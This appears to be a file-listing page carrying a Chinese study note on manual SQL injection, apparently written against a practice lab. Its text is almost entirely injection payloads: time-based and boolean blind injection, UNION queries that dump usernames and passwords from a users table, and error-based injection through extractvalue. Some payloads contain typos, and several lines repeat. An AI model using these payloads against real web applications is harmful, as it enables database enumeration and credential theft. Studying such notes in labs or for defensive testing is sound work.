文件名称:sql手注笔记.docx
文件大小:13KB
文件格式:DOCX
更新时间:2023-01-19 09:33:37
sql
延时注入 ?id=1' and if(ascii(substr(database(),1,1))>90,1,sleep(5))--+ ?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+ select table_name from information_schema.tables where table_schema='security' limit 0,1 盲注 Left ?Id=1 and 1=left(database(),1)=5--+ Substr ?Id=1 and ascii(substr(database(),1,1))>90--+ Regexp ?id=1' and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-z]' limit 0,1)--+ 联合注入 id=-1 ' union select 1,schema_name,3 from informaiton_schema.schemata --+ id=-1' union select 1,tbale_name,3 from information_schema.tables where table_name='security'--+ id=-1' union select username,password,3 from users where id=2--+ limit 0,1 第几个数据表 substr(database,1,1) 修改第几个字母 Mysql_set_charset('gbk','$conn') Left ?Id=1 and 1=left(database(),1)=5--+ Substr ?Id=1 and ascii(substr(database(),1,1))>90--+ Regexp ?id=1' and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-z]' limit 0,1)--+ ?Id=1’ and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+ @@basedir lines terminated by